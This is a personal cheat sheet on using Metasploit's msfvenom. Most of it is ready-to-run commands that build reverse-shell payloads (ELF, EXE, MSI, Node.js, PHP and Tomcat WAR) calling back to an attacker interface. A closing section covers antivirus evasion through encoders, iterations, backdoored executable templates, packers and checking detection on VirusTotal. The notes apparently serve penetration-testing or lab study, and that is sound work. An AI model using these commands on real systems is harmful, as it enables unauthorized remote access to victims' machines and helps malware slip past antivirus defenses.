π msfvenom π
msfvenom is a tool of the metasploit framework to generate payloads for reverse shells. We can customize payloads according to:
- π the program executing the payload (PHP, python...)
- π‘ the target operating system
- π‘οΈ the presence and configuration of a firewall
- π«οΈ the presence and configuration of an antivirus
- ...
$ msfvenom --list payloads
$ msfvenom --list payloads | grep meterpreter
msfvenom is often used with the msfconsole to catch them and pop a meterpreter shell (see Metasploit framework, in short, an upgraded shell).
Metasploit separated staged payloads from inline payloads. The former is involving two steps: a simple payload (called stage/stager) is sent, which then request the rest of the payload. They are mainly used when there is a restriction on the size of the payload.
In Metasploit, the _
is replaced with a /
for staged payloads.
-
php/meterpreter_reverse_tcp
: inline/single -
php/meterpreter/reverse_tcp
: staged
πΈ Common options πΈ
-p to define the payload to use.
$ msfvenom -p cmd/unix/reverse_netcat [...]
LHOST/LPORT to define where the target will connect back.
$ msfvenom [...] LHOST=tun0 LPORT=4444
-f to define the format of the output. For instance, raw code.
$ msfvenom [...] -f raw
$ msfvenom [...] R # same for -f RAW
-e to define the encoding. It's mainly used to bypass firewall or reduce the size of the payload.
$ msfvenom [...] -e php/base64
π Some payloads π
All examples are asking the target to connect back to tun0
IP at the port 4444
.
- Linux (.elf / ...)
# execute /bin/bash -p
$ msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell.elf
# Generate a .elf opening a reverse shell (TCP)
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f elf -o shell.elf
# Output a command (RAW) opening a reverse shell with netcat
$ msfvenom -p cmd/unix/reverse_netcat LHOST=tun0 LPORT=4444 -f raw
- Windows (.exe / .msi / ...)
# Generate a .exe opening a reverse shell (TCP)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f exe -o shell.exe
# Generate a malicious installer (msi)
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=4444 -f msi -o shell.msi
- Node.js
# Generate a .js opening a reverse shell (TCP)
$ msfvenom -p nodejs/shell_reverse_tcp LHOST=tun0 LPORT=4444 -o shell.js
- PHP
# very unstable shell, not recommended
$ msfvenom -p php/reverse_php LHOST=tun0 LPORT=4444 -o revshell.php
# meterpreter
$ msfvenom -p php/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 -o revshell.php
- Tomcat
# works with Tomcat 7.8
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=4444 -f war -o revshell.war
π» To-do π»
Stuff that I found, but never read/used yet.
Payload Encoding: make the payload comptabible with different architectures and help with antivirus evasion.
- Shikata Ga Nai (SGN): good but still detected by modern antivirus.
-e x86/shikata_ga_nai
- Use iterations to make it harder to detect:
-i 10
- Password-protected archives are an additional antivirus evasion technique
- backdoored executable: use executable templates to hide the code
- Packers are also an alternative: polypack
Other options:
-
-a x86
: explicit architecture -
--platform windows
: explicit platform -
-k
: with backdoored executable, the original executable still runs as it was. If started from a terminal, a new terminal will (still) pop. -
-x xxx.exe
-
-o xxx.exe
Test on Virus Total: msf-virustotal -k <API key> -f xxx.exe